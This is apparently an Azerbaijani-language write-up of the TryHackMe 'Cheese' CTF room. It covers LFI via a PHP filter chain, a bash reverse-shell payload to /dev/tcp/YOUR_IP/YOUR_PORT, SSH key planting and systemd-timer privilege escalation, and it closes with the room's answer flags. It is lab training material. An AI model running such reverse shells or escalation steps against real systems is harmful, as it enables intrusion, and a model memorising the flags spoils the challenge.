August 4, 2026
CHEESE CTF | TRYHACKME
Salam ilk öncə İP-ni scan edirəm.
By Tabrizabuzarov
2 min read
Bu əmrdən yük yaratmaq üçün istifadə edirəm.
dollarpython3 php_filer.py --chain "<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'\"); ?>" | grep "^php" > payload.txt
daha sonra bu scripti URL hissəsinə yapışdırıb, öz cihazımda netcat dinləyicisini işə salıram.
Bu urli tapanda Yerli Fayl Daxilliyini (LFI) sınaqdan keçirmək qərarına gəldim. Çünki fayl parametri düzgün şəkildə dezinfeksiya edilmədikdə, bu, Yerli Fayl Daxilliyi (LFI) zəifliyinə səbəb ola bilər.
Və scan zamanı "secret-script.php" URL var ona keçid edirəm, və orda adi kommandlar yazıb görürəm ki, serverdən cavab qayıdır.
Və netcat ilə daxil oluram.
www-data istifadəçisi olaraq veb qabığı uğurla əldə etdikdən sonra növbəti məqsəd comte istifadəçi hesabına giriş əldə etmək idi. Girişimi artırmağın potensial yollarını axtarmaq üçün sistemi araşdırmağa başladım.
Daha sonra öz açıq SSH kopyalayıb, cihazda authorized_keys daxil edirəm.
Daha sonra SSH ilə bu faylla COMTE adıyla cihaza daxil oluram.
Daha sonra "sudo -l" ilə baxıram necə privilege escalation edə bilərəm.
Bundan sonra, kompüterimdəki ssh-i comte istifadəçisi olan [ip] ünvanına qoşmağa çalışıram.
Comte istifadəçisinə giriş əldə etdikdən sonra, linpeas istifadə edərək imtiyazları artırmağa çalışdım. İmtiyazlarımı yoxlamaq üçün sudo -l əmrini işlətdim. Bu, /bin/systemctl əmrini root olaraq icra edə bildiyimi göstərdi.
/etc/systemd/system/exploit.timer faylına oxumaq və yazmaq imkanım var idi. Gəlin /etc/systemd/system/exploit.service xidmətinin arxasında nəyin dayandığına nəzər salaq. Bu xidmət xxd-ni /opt-a kopyalayır və onu SUID ikili faylına çevirir. O zaman hələ də kök istifadəçinin ixtiyarında olduğundan, istənilən faylı oxumaq üçün istifadə edə bilərik.
Əgər bu konfiqurasiyanı dəyişə bilsəm, root girişi əldə edə və ya root.txt faylını oxumaq üçün giriş əldə edə bilərəm. Beləliklə, /etc/systemd/system qovluğuna gedin və exploit.timer konfiqurasiya faylını buna dəyişdirin.
Bu faylı saxladım və /opt qovluğuna keçdim. Xidməti aşağıdakı kimi işə saldım, bu xidmət xxd-ni /opt- a kopyalayır və qırmızı fon tərəfindən tanınan SUID bitini təyin edir.
Növbəti addımda hansı faylı oxumaq istədiyimi göstərirəm. Məni ilk maraqlandıran şey kök bayrağıdır.
USER.TXT ?
Cavab: THM{9f2ce3df1beeecaf695b3a8560c682704c31b17a}
ROOT.TXT?
Cavab: THM{dca75486094810807faf4b7b0a929b11e5e0167c}
UĞURLAR!!